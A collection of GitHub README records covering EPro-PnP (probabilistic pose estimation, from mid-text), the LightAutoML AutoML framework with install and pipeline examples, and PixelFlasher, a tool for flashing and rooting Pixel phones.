This leads to convergence issue if all the components in <!-- $X$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?X"> must be learned by the network. In contrast, our probabilistic PnP layer outputs a posterior distribution of pose, whose probability density <!-- $p(y|X)$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?p(y%7CX)"> can be derived for proper backpropagation. The distribution is approximated via Monte Carlo sampling. With EPro-PnP, the correspondences <!-- $X$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?X"> can be learned from scratch altogether by minimizing the KL divergence between the predicted and target pose distribution. ## Models ### V1 models in this repository #### **[EPro-PnP-6DoF](EPro-PnP-6DoF) for 6DoF pose estimation**<br> <img src="EPro-PnP-6DoF/viz.gif" width="500" alt=""/> #### **[EPro-PnP-Det](EPro-PnP-Det) for 3D object detection** <img src="EPro-PnP-Det/resources/viz.gif" width="500" alt=""/> ### New V2 models #### **[EPro-PnP-Det v2](https://github.com/tjiiv-cprg/EPro-PnP-v2/tree/main/EPro-PnP-Det_v2): state-of-the-art monocular 3D object detector** Main differences to [v1b](EPro-PnP-Det): - Use GaussianMixtureNLLLoss as auxiliary coordinate regression loss - Add auxiliary depth and bbox losses At the time of submission (Aug 30, 2022), EPro-PnP-Det v2 **ranks 1st** among all camera-based single-frame object detection models on the [official nuScenes benchmark](https://www.nuscenes.org/object-detection?externalData=no&mapData=no&modalities=Camera) (test split, without extra data). | Method | TTA | Backbone | NDS | mAP | mATE | mASE | mAOE | mAVE | mAAE | Schedule | |:---------------------------------------------------------|:---:|:---------|:---------:|:---------:|:---------:|:---------:|:---------:|:---------:|:---------:|:--------:| | EPro-PnP-Det v2 (ours) | Y | R101 | **0.490** | 0.423 | 0.547 | **0.236** | **0.302** | 1.071 | 0.123 | 12 ep | | [PETR](https://github.com/megvii-research/petr) | N | Swin-B | 0.483 | **0.445** | 0.627 | 0.249 | 0.449 | 0.927 | 0.141 | 24 ep | | [BEVDet-Base](https://github.com/HuangJunJie2017/BEVDet) | Y | Swin-B | 0.482 | 0.422 | **0.529** | **0.236** | 0.395 | 0.979 | 0.152 | 20 ep | | EPro-PnP-Det v2 (ours) | N | R101 | 0.481 | 0.409 | 0.559 | 0.239 | 0.325 | 1.090 | **0.115** | 12 ep | | [PolarFormer](https://github.com/fudan-zvg/PolarFormer) | N | R101 | 0.470 | 0.415 | 0.657 | 0.263 | 0.405 | **0.911** | 0.139 | 24 ep | | [BEVFormer-S](https://github.com/zhiqi-li/BEVFormer) | N | R101 | 0.462 | 0.409 | 0.650 | 0.261 | 0.439 | 0.925 | 0.147 | 24 ep | | [PETR](https://github.com/megvii-research/petr) | N | R101 | 0.455 | 0.391 | 0.647 | 0.251 | 0.433 | 0.933 | 0.143 | 24 ep | | [EPro-PnP-Det v1](EPro-PnP-Det_v2) | Y | R101 | 0.453 | 0.373 | 0.605 | 0.243 | 0.359 | 1.067 | 0.124 | 12 ep | | [PGD](https://github.com/open-mmlab/mmdetection3d) | Y | R101 | 0.448 | 0.386 | 0.626 | 0.245 | 0.451 | 1.509 | 0.127 | 24+24 ep | | [FCOS3D](https://github.com/open-mmlab/mmdetection3d) | Y | R101 | 0.428 | 0.358 | 0.690 | 0.249 | 0.452 | 1.434 | 0.124 | - | #### **[EPro-PnP-6DoF v2](https://github.com/tjiiv-cprg/EPro-PnP-v2/tree/main/EPro-PnP-6DoF_v2) for 6DoF pose estimation**<br> Main differences to [v1b](EPro-PnP-6DoF): - Fix w2d scale handling **(very important)** - Improve network initialization - Adjust loss weights With these updates the v2 
model can be trained **without 3D models** to achieve better performance (ADD 0.1d = 93.83) than [GDRNet](https://github.com/THU-DA-6D-Pose-Group/GDR-Net) (ADD 0.1d = 93.6), unleashing the full potential of simple end-to-end training.

## Use EPro-PnP in Your Own Model

We provide a [demo](demo/fit_identity.ipynb) on the usage of the EPro-PnP layer (see also the illustrative sketch after the citation below).

## Citation

If you find this project useful in your research, please consider citing:

```
@inproceedings{epropnp, 
  title={EPro-PnP: Generalized End-to-End Probabilistic Perspective-n-Points for Monocular Object Pose Estimation},
  author={Hansheng Chen and Pichao Wang and Fan Wang and Wei Tian and Lu Xiong and Hao Li},
  booktitle={IEEE Conference on Computer Vision and Pattern Recognition (CVPR)},
  year={2022}
}
```
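For a concrete feel of the probabilistic layer before opening the demo notebook above, here is a minimal sketch (our illustration, not the authors' implementation) of the Monte Carlo view of the pose posterior. With p(y|X) proportional to exp(-c(y)), where c is the weighted reprojection cost, the negative log-likelihood of a target pose is its cost plus a log normalizer that can be estimated by importance sampling over pose samples:

```python
# Illustrative sketch only (not the authors' code): Monte Carlo estimate of
# -log p(y_gt | X) for a Boltzmann-style pose posterior p(y) ~ exp(-c(y)).
import torch

def mc_pose_nll(cost_gt, cost_samples, log_q):
    """cost_gt:      scalar reprojection cost at the target pose
    cost_samples: (J,) costs at J pose samples y_j drawn from a proposal q
    log_q:        (J,) log density of the proposal at each sample
    """
    # log Z ~= log( (1/J) * sum_j exp(-c_j) / q(y_j) )   (importance sampling)
    log_J = torch.log(torch.tensor(float(cost_samples.numel())))
    log_Z = torch.logsumexp(-cost_samples - log_q, dim=0) - log_J
    return cost_gt + log_Z  # -log p(y_gt | X) = c(y_gt) + log Z

# Toy usage with made-up numbers; in EPro-PnP the costs come from the learned
# 2D-3D correspondences and the samples from an adaptive proposal (AMIS).
print(mc_pose_nll(torch.tensor(1.2), torch.randn(64).abs(), torch.zeros(64)))
```

Minimizing this quantity pulls the cost down at the target pose while pushing it up elsewhere, the continuous analogue of cross-entropy training with a categorical Softmax.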
[CVPR 2022 Oral, Best Student Paper] EPro-PnP: Generalized End-to-End Probabilistic Perspective-n-Points for Monocular Object Pose Estimation
pose-estimation,6dof,3d-object-detection,perspective-n-point,pytorch,cvpr,monocular,levenberg-marquardt,gauss-newton
0
1
0
24
51
1
0
sb-ai-lab/LightAutoML
<img src=https://github.com/AILab-MLTools/LightAutoML/raw/master/imgs/LightAutoML_logo_big.png />

# LightAutoML - automatic model creation framework

[![Telegram](https://img.shields.io/badge/chat-on%20Telegram-2ba2d9.svg)](https://t.me/lightautoml)
![PyPI - Downloads](https://img.shields.io/pypi/dm/lightautoml?color=green&label=PyPI%20downloads&logo=pypi&logoColor=orange&style=plastic)
![Read the Docs](https://img.shields.io/readthedocs/lightautoml?style=plastic)
[![Black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)
![Poetry-Lock](https://img.shields.io/github/workflow/status/sb-ai-lab/LightAutoML/Poetry%20run/master?label=Poetry-Lock)

LightAutoML (LAMA) is an AutoML framework which provides automatic model creation for the following tasks:
- binary classification
- multiclass classification
- regression

The current version of the package handles datasets that have independent samples in each row, i.e. **each row is an object with its specific features and target**. Multitable datasets and sequences are a work in progress :)

**Note**: we use the [`AutoWoE`](https://pypi.org/project/autowoe) library to automatically create interpretable models.

**Authors**: [Alexander Ryzhkov](https://kaggle.com/alexryzhkov), [Anton Vakhrushev](https://kaggle.com/btbpanda), [Dmitry Simakov](https://kaggle.com/simakov), Rinchin Damdinov, Vasilii Bunakov, Alexander Kirilin, Pavel Shvets.

**Documentation** of LightAutoML is available [here](https://lightautoml.readthedocs.io/); you can also [generate](https://github.com/AILab-MLTools/LightAutoML/blob/master/.github/CONTRIBUTING.md#building-documentation) it.

# (New features) GPU and Spark pipelines

Full GPU and Spark pipelines for LightAutoML are currently available for developer testing (still in progress). The code and tutorials for:
- the GPU pipeline are [available here](https://github.com/Rishat-skoltech/LightAutoML_GPU)
- the Spark pipeline are [available here](https://github.com/sb-ai-lab/SLAMA)

<a name="toc"></a>
# Table of Contents

* [Installing LightAutoML from PyPI](#installation)
* [Quick tour](#quicktour)
* [Resources](#examples)
* [Contributing to LightAutoML](#contributing)
* [License](#apache)
* [For developers](#developers)
* [Support and feature requests](#support)

<a name="installation"></a>
# Installation
To install the LAMA framework on your machine from PyPI, execute the following commands:

```bash
# Install base functionality:
pip install -U lightautoml

# For partial installation use corresponding option.
# Extra dependencies: [nlp, cv, report]
# Or you can use 'all' to install everything
pip install -U lightautoml[nlp]
```

Additionally, run the following commands to enable pdf report generation:

```bash
# MacOS
brew install cairo pango gdk-pixbuf libffi

# Debian / Ubuntu
sudo apt-get install build-essential libcairo2 libpango-1.0-0 libpangocairo-1.0-0 libgdk-pixbuf2.0-0 libffi-dev shared-mime-info

# Fedora
sudo yum install redhat-rpm-config libffi-devel cairo pango gdk-pixbuf2

# Windows
# follow this tutorial https://weasyprint.readthedocs.io/en/stable/install.html#windows
```

[Back to top](#toc)

<a name="quicktour"></a>
# Quick tour

Let's solve the popular Kaggle Titanic competition below.
There are two main ways to solve machine learning problems using LightAutoML:
* Use a ready preset for tabular data:

```python
import pandas as pd
from sklearn.metrics import f1_score

from lightautoml.automl.presets.tabular_presets import TabularAutoML
from lightautoml.tasks import Task

df_train = pd.read_csv('../input/titanic/train.csv')
df_test = pd.read_csv('../input/titanic/test.csv')

automl = TabularAutoML(
    task = Task(
        name = 'binary',
        metric = lambda y_true, y_pred: f1_score(y_true, (y_pred > 0.5)*1))
)
oof_pred = automl.fit_predict(
    df_train,
    roles = {'target': 'Survived', 'drop': ['PassengerId']}
)
test_pred = automl.predict(df_test)

pd.DataFrame({
    'PassengerId':df_test.PassengerId,
    'Survived': (test_pred.data[:, 0] > 0.5)*1
}).to_csv('submit.csv', index = False)
```

The LightAutoML framework has a lot of ready-to-use parts and extensive customization options; to learn more, check out the [resources](#Resources) section.

[Back to top](#toc)

<a name="examples"></a>
# Resources

### Kaggle kernel examples of LightAutoML usage:

- [Tabular Playground Series April 2021 competition solution](https://www.kaggle.com/alexryzhkov/n3-tps-april-21-lightautoml-starter)
- [Titanic competition solution (80% accuracy)](https://www.kaggle.com/alexryzhkov/lightautoml-titanic-love)
- [Titanic **12-code-lines** competition solution (78% accuracy)](https://www.kaggle.com/alexryzhkov/lightautoml-extreme-short-titanic-solution)
- [House prices competition solution](https://www.kaggle.com/alexryzhkov/lightautoml-houseprices-love)
- [Natural Language Processing with Disaster Tweets solution](https://www.kaggle.com/alexryzhkov/lightautoml-starter-nlp)
- [Tabular Playground Series March 2021 competition solution](https://www.kaggle.com/alexryzhkov/lightautoml-starter-for-tabulardatamarch)
- [Tabular Playground Series February 2021 competition solution](https://www.kaggle.com/alexryzhkov/lightautoml-tabulardata-love)
- [Interpretable WhiteBox solution](https://www.kaggle.com/simakov/lama-whitebox-preset-example)
- [Custom ML pipeline elements inside existing ones](https://www.kaggle.com/simakov/lama-custom-automl-pipeline-example)
- [Tabular Playground Series November 2022 competition solution with Neural Networks](https://www.kaggle.com/code/mikhailkuz/lightautoml-nn-happiness)

### Google Colab tutorials and [other examples](examples/):

- [`Tutorial_1_basics.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_1_basics.ipynb) - get started with LightAutoML on tabular data.
- [`Tutorial_2_WhiteBox_AutoWoE.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_2_WhiteBox_AutoWoE.ipynb) - creating interpretable models.
- [`Tutorial_3_sql_data_source.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_3_sql_data_source.ipynb) - shows how to use LightAutoML presets (both standalone and time-utilized variants) for solving ML tasks on tabular data from an SQL database instead of CSV.
- [`Tutorial_4_NLP_Interpretation.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_4_NLP_Interpretation.ipynb) - example of using the TabularNLPAutoML preset and LimeTextExplainer.
- [`Tutorial_5_uplift.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_5_uplift.ipynb) - shows how to use LightAutoML for an uplift-modeling task.
- [`Tutorial_6_custom_pipeline.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_6_custom_pipeline.ipynb) - shows how to create your own pipeline from specified blocks: pipelines for feature generation and feature selection, ML algorithms, hyperparameter optimization etc.
- [`Tutorial_7_ICE_and_PDP_interpretation.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_7_ICE_and_PDP_interpretation.ipynb) - shows how to obtain local and global interpretations of model results using ICE and PDP approaches.
- [`Tutorial_8_CV_preset.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_8_CV_preset.ipynb) - example of using the TabularCVAutoML preset in a CV multi-class classification task.
- [`Tutorial_9_neural_networks.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_9_neural_networks.ipynb) - example of using the Tabular preset with neural networks.
- [`Tutorial_10_relational_data_with_star_scheme.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_10_relational_data_with_star_scheme.ipynb) - example of using the Tabular preset with relational data in a star scheme.
- [`Tutorial_11_time_series.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_11_time_series.ipynb) - example of using the Tabular preset with timeseries data.
- [`Tutorial_12_Matching.ipynb`](https://colab.research.google.com/github/AILab-MLTools/LightAutoML/blob/master/examples/tutorials/Tutorial_12_Matching.ipynb) - example of using the addon for matching.

**Note 1**: for production you do not need to use the profiler (which increases work time and memory consumption), so please do not turn it on; it is off by default.

**Note 2**: to take a look at this report after the run, please comment out the last line of the demo (the report deletion command).
### Courses, videos and papers

* **LightAutoML crash courses**:
    - (Russian) [AutoML course for OpenDataScience community](https://ods.ai/tracks/automl-course-part1)

* **Video guides**:
    - (Russian) [LightAutoML webinar for Sberloga community](https://www.youtube.com/watch?v=ci8uqgWFJGg) ([Alexander Ryzhkov](https://kaggle.com/alexryzhkov), [Dmitry Simakov](https://kaggle.com/simakov))
    - (Russian) [LightAutoML hands-on tutorial in Kaggle Kernels](https://www.youtube.com/watch?v=TYu1UG-E9e8) ([Alexander Ryzhkov](https://kaggle.com/alexryzhkov))
    - (English) [Automated Machine Learning with LightAutoML: theory and practice](https://www.youtube.com/watch?v=4pbO673B9Oo) ([Alexander Ryzhkov](https://kaggle.com/alexryzhkov))
    - (English) [LightAutoML framework general overview, benchmarks and advantages for business](https://vimeo.com/485383651) ([Alexander Ryzhkov](https://kaggle.com/alexryzhkov))
    - (English) [LightAutoML practical guide - ML pipeline presets overview](https://vimeo.com/487166940) ([Dmitry Simakov](https://kaggle.com/simakov))

* **Papers**:
    - Anton Vakhrushev, Alexander Ryzhkov, Dmitry Simakov, Rinchin Damdinov, Maxim Savchenko, Alexander Tuzhilin ["LightAutoML: AutoML Solution for a Large Financial Services Ecosystem"](https://arxiv.org/pdf/2109.01528.pdf). arXiv:2109.01528, 2021.

* **Articles about LightAutoML**:
    - (English) [LightAutoML vs Titanic: 80% accuracy in several lines of code (Medium)](https://alexmryzhkov.medium.com/lightautoml-preset-usage-tutorial-2cce7da6f936)
    - (English) [Hands-On Python Guide to LightAutoML – An Automatic ML Model Creation Framework (Analytics India Mag)](https://analyticsindiamag.com/hands-on-python-guide-to-lama-an-automatic-ml-model-creation-framework/?fbclid=IwAR0f0cVgQWaLI60m1IHMD6VZfmKce0ZXxw-O8VRTdRALsKtty8a-ouJex7g)

[Back to top](#toc)

<a name="contributing"></a>
# Contributing to LightAutoML
If you are interested in contributing to LightAutoML, please read the [Contributing Guide](.github/CONTRIBUTING.md) to get started.

[Back to top](#toc)

<a name="apache"></a>
# License
This project is licensed under the Apache License, Version 2.0. See the [LICENSE](https://github.com/AILab-MLTools/LightAutoML/blob/master/LICENSE) file for more details.
[Back to top](#toc)

<a name="developers"></a>
# For developers

## Build your own custom pipeline:

```python
import pandas as pd

# building-block imports as used in the LightAutoML tutorials
from lightautoml.automl.base import AutoML
from lightautoml.ml_algo.boost_lgbm import BoostLGBM
from lightautoml.ml_algo.tuning.optuna import OptunaTuner
from lightautoml.pipelines.features.lgb_pipeline import LGBSimpleFeatures
from lightautoml.pipelines.ml.base import MLPipeline
from lightautoml.pipelines.selection.importance_based import (
    ImportanceCutoffSelector,
    ModelBasedImportanceEstimator,
)
from lightautoml.reader.base import PandasToPandasReader
from lightautoml.tasks import Task

# example run parameters
N_THREADS = 4
N_FOLDS = 5
RANDOM_STATE = 42

df_train = pd.read_csv('../input/titanic/train.csv')
df_test = pd.read_csv('../input/titanic/test.csv')

# define that the machine learning problem is a binary classification task
task = Task("binary")

reader = PandasToPandasReader(task, cv=N_FOLDS, random_state=RANDOM_STATE)

# create a feature selector
model0 = BoostLGBM(
    default_params={'learning_rate': 0.05, 'num_leaves': 64, 'seed': 42, 'num_threads': N_THREADS}
)
pipe0 = LGBSimpleFeatures()
mbie = ModelBasedImportanceEstimator()
selector = ImportanceCutoffSelector(pipe0, model0, mbie, cutoff=0)

# build first level pipeline for AutoML
pipe = LGBSimpleFeatures()
# stop after 20 iterations or after 30 seconds
params_tuner1 = OptunaTuner(n_trials=20, timeout=30)
model1 = BoostLGBM(
    default_params={'learning_rate': 0.05, 'num_leaves': 128, 'seed': 1, 'num_threads': N_THREADS}
)
model2 = BoostLGBM(
    default_params={'learning_rate': 0.025, 'num_leaves': 64, 'seed': 2, 'num_threads': N_THREADS}
)
pipeline_lvl1 = MLPipeline([
    (model1, params_tuner1),
    model2
], pre_selection=selector, features_pipeline=pipe, post_selection=None)

# build second level pipeline for AutoML
pipe1 = LGBSimpleFeatures()
model = BoostLGBM(
    default_params={'learning_rate': 0.05, 'num_leaves': 64, 'max_bin': 1024, 'seed': 3, 'num_threads': N_THREADS},
    freeze_defaults=True
)
pipeline_lvl2 = MLPipeline([model], pre_selection=None, features_pipeline=pipe1, post_selection=None)

# build AutoML pipeline
automl = AutoML(reader, [
    [pipeline_lvl1],
    [pipeline_lvl2],
], skip_conn=False)

# train AutoML and get predictions
oof_pred = automl.fit_predict(df_train, roles = {'target': 'Survived', 'drop': ['PassengerId']})
test_pred = automl.predict(df_test)

pd.DataFrame({
    'PassengerId':df_test.PassengerId,
    'Survived': (test_pred.data[:, 0] > 0.5)*1
}).to_csv('submit.csv', index = False)
```

[Back to top](#toc)

<a name="support"></a>
# Support and feature requests

Seek prompt advice at the [Telegram group](https://t.me/lightautoml).

Open bug reports and feature requests on GitHub [issues](https://github.com/AILab-MLTools/LightAutoML/issues).
Fast and customizable framework for automatic ML model creation (AutoML)
automl,data-science,machine-learning,python,automated-machine-learning,automatic-machine-learning,automl-algorithms,binary-classification,kaggle,lama
1
15
97
204
28
42
4
badabing2005/PixelFlasher
<img src="/images/icon-dark-128.png" alt="PixelFlasher Icon" align="left" /> <h1> PixelFlasher </h1> [![License](https://img.shields.io/badge/License-GPLv3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0) [![Github Releases](https://img.shields.io/github/downloads/badabing2005/PixelFlasher/total.svg?style=flat)](https://github.com/badabing2005/PixelFlasher/releases) ## DESCRIPTION As the name suggests this is an application to flash (update) Pixelโ„ข phones (possibly all Googleโ„ข made phones/tablets, YMMV.) PixelFlasher at its core is a UI layer (with bells and whistles) on top of adb / fastboot commands, hence many of its features can be used on non Pixel devices as well. (YMMV). The executable which can be found in [releases section](https://github.com/badabing2005/PixelFlasher/releases) is self contained and does not require Pythonโ„ข to be installed on the system. The application has two modes, normal mode (basic) and advanced mode (expert). **Basic mode:** Should suit most users. Some of the features in basic mode are: - Simple UI interface, click and go. No more command line, no more placing all files in one directory. - `boot.img` / `init_boot.img` management UI, select the boot / init_boot file to patch and click the patch button. Fully Automated patching with Magisk (without manual steps) and perform upgrades without losing root. No more manually extracting files transferring to the phone, patching / re-flashing and doing multiple reboots. No more setting airplane mode and clearing storage to retain Safetynet / Play Integrity passing. - Display details of `boot.img` (or `init_boot.img` for Pixel 7 or newer devices). - SHA1 checksum. - Origin (file it was extracted from). - Whether it is patched or not, and if it is patched. - What version of Magisk was used to patch it. - On what device it was patched. - Date of patching. - The SHA1 of the source boot.img file. - Option to Live boot from a choice of boot.img or patched image. - Flash just the boot / init_boot image. - Choose to keep data or wipe data while flashing (Full OTA flashing always keeps data). - Ability to flash even if multiple devices are connected to the computer. - Option to flash to inactive slot (Full OTA always flashes to inactive slot). - Display information about the phone. - ID - Hardware model. - Device architecture. - Current installed firmware (build). - If it is rooted with Magisk. - Magisk version (Magisk Tools). - Magisk Manager version (the app). - List installed Magisk modules. - Connection mode (Adb | Fastboot | Sideload | Recovery). - Bootloader version. - Active slot. - Android OS API version. - Convenient quick links to download Android platform tools or device firmware. - And a lot more... - Magisk Manager installation UI, [screenshot](images/Magisk-Installer.png). Supported versions: - stable (official) - beta (official) - canary (official) - debug (official) - delta - special builds that disable modules (used to recover from bootloops due to bad module(s) when safe mode does not work). - Magisk Backup Manager, [screenshot](images/Magisk-Backup-Manager.png). - List all Magisk backups currently on the device. - Highlight the one that is backup of the current installed version. - Delete backups. - Manually add backup from PC. - Auto Backup: PixelFlasher figures out what needs to be backed up, and if it finds it on the PC, it creates the backup. 
- Magisk settings management, [screenshot](images/magisk-settings.png):
  - Enable / disable Magisk modules; this comes in handy to disable suspect modules before an upgrade.
  - Install Magisk module.
  - Enable / disable Zygisk.
  - Enable / disable Magisk denylist.
  - Add / remove application to Magisk denylist (through PixelFlasher's App Manager).
  - Grant / deny SU permissions to an app, with control of (through PixelFlasher's App Manager):
    - Enable / disable notifications
    - Enable / disable logging
    - Grant until (Forever, 10 min, 20 min, 30 min, 60 min)
    - Revoke SU permissions
- Display Android Platform Tools (SDK) version and warn / block if the version is old.
- Install APK (an app) file from the computer onto the device.
- Wireless Manager, to wirelessly connect to adb debug or adb wireless with pairing support.
- Advanced features are hidden to keep the interface simple and easy to follow.
- Easily open an ADB shell to the device.
- Support for Genymotion Scrcpy to mirror Android devices (video and audio) via USB or over TCP/IP, which allows you to control the device with the keyboard and the mouse of the computer.
- A lot of checks and validations for smooth operation, with quite verbose console output to inform about every step of the operation.
- Automatic check for program updates.
- Package (Application) Manager, [screenshot](images/Package-Manager.png):
  - Disable (Freeze)
  - Enable
  - Uninstall
  - Install APK
  - Download APK
  - Multi-Select
  - Show Package Details.
  - Add app to Magisk denylist.
  - Control app's superuser permissions, [screenshot](images/su-permissions.png).

**Expert mode:** (should only be turned on by experienced users). In addition to the basic features, you get:

- The ability to flash custom ROM (with or without patching `boot` / `init_boot`)
- Option to flash to both slots.
- Options to disable verity and/or verification.
- Ability to change the active slot.
- Ability to live boot to custom `boot` / `init_boot` (temporary root).
- Ability to boot to recovery, fastbootd, safe mode, download mode and sideload.
- Ability to flash custom image: boot, recovery, radio, kernel, ...
- Ability to sideload an image.
- Lock / Unlock bootloader.
- Option to gain temporary root (good for testing or checking things out).
- SOS: Disable Magisk modules to get out of bootloop (experimental).
- Force option when flashing.
- Option to skip rebooting.
- Option to wipe.
- Partition Manager:
  - Erase single or multiple partitions.
  - Dump / create backup of single or multiple partitions and save to PC.

## Prerequisites

- [Android SDK Platform-Tools](https://developer.android.com/studio/releases/platform-tools.html).
- Android Pixel phone [factory image](https://developers.google.com/android/images) or Android Pixel phone [full OTA image](https://developers.google.com/android/ota).
- Bootloader unlocked phone (see excellent guide links in the credits section below).
- On Windows: The latest [Google USB drivers](https://developer.android.com/studio/run/win-usb?authuser=1%2F) installed in adb and fastboot modes.
- On MacOS: [Allow USB Accessory to connect](https://support.apple.com/en-us/102282) (very important!).
- On Linux: [User needs to be added](https://developer.android.com/studio/run/device#setting-up) to the `plugdev` group.

## Installation

PixelFlasher doesn't have to be installed; just double-click it and it'll start. Check the [releases section](https://github.com/badabing2005/PixelFlasher/releases) for downloads.
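If you script your setup, you can confirm the prerequisites above are satisfied before launching PixelFlasher. The helper below is a generic sketch of ours (not PixelFlasher code): it only checks that `adb` from Android SDK Platform-Tools is on your `PATH` and lists the devices that PixelFlasher's `Scan` button would later find:

```python
# Generic helper (not PixelFlasher code): verify adb is installed and list
# connected devices, similar to what the Scan button does via adb/fastboot.
import shutil
import subprocess

adb = shutil.which("adb")
if adb is None:
    raise SystemExit("adb not found -- install Android SDK Platform-Tools first")

# 'adb devices -l' prints one line per connected device with its mode
out = subprocess.run([adb, "devices", "-l"], capture_output=True, text=True, check=True)
print(out.stdout)
```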
### Supported platforms

- Windows
- MacOSX
- Linux (See [this](https://github.com/badabing2005/PixelFlasher/issues/23) if you're having issues with a Linux build.)

## Status

Scan the [list of open issues](https://github.com/badabing2005/PixelFlasher/issues) for bugs and pending features.

**Note**
This is my first wxPython based project. I got ideas and inspiration from [nodemcu-pyflasher](https://github.com/marcelstoer/nodemcu-pyflasher).
If you have constructive feedback on how to improve the code, please do reach out to me.

## Build it yourself

If you want to build this application yourself you need to:

**Setup**

- Download or clone the repository.
- Install [Python 3.x](https://www.python.org/downloads/) and [Pip](https://pip.pypa.io/en/stable/installing/) (it comes with Python™ if installed from `python.org`). _See the note below if building on MacOS._
- Install virtualenv: `pip3 install virtualenv`
- Create a virtual environment with:
  - On Windows: `virtualenv --python <PATH_TO_PYTHON_EXE> venv`
  - On Linux / MacOS: `python3 -m venv venv`
- Activate the virtual environment with:
  - On Windows: `.\venv\Scripts\activate`
  - On Linux / MacOS: `. venv/bin/activate`
- Run `pip3 install -r requirements.txt`

**A note on Linux:** As described on the [downloads section of `wxPython`](https://www.wxpython.org/pages/downloads/), wheels for Linux are complicated and may require you to run something like this to install `wxPython` correctly:

```bash
# Assuming you are running it on Ubuntu 20.04 LTS with GTK3
pip install -U \
    -f https://extras.wxpython.org/wxPython4/extras/linux/gtk3/ubuntu-20.04 \
    wxPython
```

**A note on Windows**
If you run into trouble installing wxPython on Windows, you can download a wxPython wheel file matching your version of Python™ from [here](https://wxpython.org/Phoenix/snapshot-builds/?C=M;O=D).
Look for `cp310` if your Python™ version is 3.10.
You install it with `pip`; for example, this would be the command to install the 3.10 version:

```bash
pip install wxPython-4.1.2a1.dev5308+2258f215-cp310-cp310-win_amd64.whl
```

**A note on MacOS**
Don't install Python™ on MacOS; instead run `brew install wxpython`. This will install Python™ 3.9.12, and the installed wxPython will only work with this version of Python.
If Python 3.9.12 is not in the system path, you can find it here: `/usr/local/Cellar/python@3.9/3.9.12/Frameworks/Python.framework/Versions/3.9/bin`
It is advised that you add this to your system `PATH`.
On MacOS, you should also install `create-dmg`:

```bash
brew install node graphicsmagick imagemagick
npm install --global create-dmg
```

**Build**
Run `build.bat` on Windows or `build.sh` on Linux / MacOS.

## Usage

### Basic Mode

![Image of PixelFlasher GUI](/images/basic-gui.png)

1. The first thing to do is select Android™ Platform Tools. If Android™ Platform Tools is already in your `PATH` environment, the application will detect it and pre-populate it. Otherwise you'd have to select where it is installed.
You can download the latest Android™ Platform Tools by clicking the ![Image of link](/images/open-link-16.png) next to it.
If you have multiple versions, you can select another version, although it is best to always use the most recent version (the selected version will be identified and displayed).
2. Hit the `Scan` button to detect connected devices; the application will detect all connected devices (in adb, fastboot, sideload, recovery modes) and populate the combo box (2).
3. Select your device from the list in the combo box.
The following information about the connected device is displayed:

- (1st field) Rooted devices will be identified with a checkmark ✓.
  **Note:** If you want PixelFlasher to detect root, or automatically use Magisk to patch boot.img, you need to grant root permissions to `shell` in Magisk.
  ![Image of shell root access](/images/shell-root.png)
- (1st field) Non-rooted devices will be identified with a ✗.
- (1st field) Devices in fastboot mode will be identified with a ? (in fastboot mode, root status cannot be determined).
- (2nd field) (adb), (f.b), (sid) or (rec) to indicate connection mode adb / fastboot / sideload / recovery.
- (3rd field) Device ID.
- (4th field) Device hardware.
- (5th field) Current running firmware (in fastboot mode current firmware cannot be determined).

4. Next, select the full OTA (recommended) or factory zip file (don't unzip); the application will recognize the phone model from the image name and validate the SHA-256 checksum.
You can download [factory images](https://developers.google.com/android/images) by clicking the ![Image of link](/images/open-link-16.png) next to it.
You can download full OTA images from [here](https://developers.google.com/android/ota).
**Note:** Because both the firmware package and the full OTA are complete images, you can upgrade to any newer version without worrying about jumping versions (downgrades with a factory image are possible only with wiped data).
5. Process the full OTA or factory image. PixelFlasher will extract the `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) file from the image and populate it in the list below (5).
6. Select `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) from the list; the selected file can be patched (6), or flashed (10).
7. Optional: Select this option if you want to patch the `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) with Magisk. If Magisk is not already installed on your phone, PixelFlasher will install it for you.
Your phone does not need to be rooted to create a patched file.
This would be the typical choice for monthly updates.
This option will allow updating the phone without losing root (not even temporarily).
**Note:** See the note above for granting root permissions to `shell`.
Whether the phone is rooted or not, the whole process requires no manual steps.
8. If you want to flash (10) a patched `boot.img` (or `init_boot.img` for Pixel 7 or newer devices), select the newly added entry.
The following details are listed:
    - ![Image of patched-boot](/images/patched-16.png) Indicates that the selection is patched.
    - **SHA1** is the (shortened for display only) SHA1 of `boot.img` (or `init_boot.img` for Pixel 7 or newer devices).
    - **Source SHA1** is the (shortened for display only) SHA1 of the source `boot.img` extracted from the image (this should be the same as the SHA1 of an unpatched `boot.img`).
    - **Package Fingerprint** is just the filename portion of the image (without the extension).
    - **Patched with Version** indicates the version of Magisk / KernelSU / Apatch used to patch the image (if applicable).
    - **Patched Method** indicates what method PixelFlasher used to create the patch (possible options: `root`, `app`, `uiautomator`, `manual`).
    - **Patched on Device** indicates the device model that performed the patching. You should always use patched images that match the model of the device they will be flashed on.
    - **Date** is either the date the `boot.img` was extracted, or the date it was patched.
    - **Package Path** indicates the file from which `boot.img` (or `init_boot.img` for Pixel 7 or newer devices) was extracted.
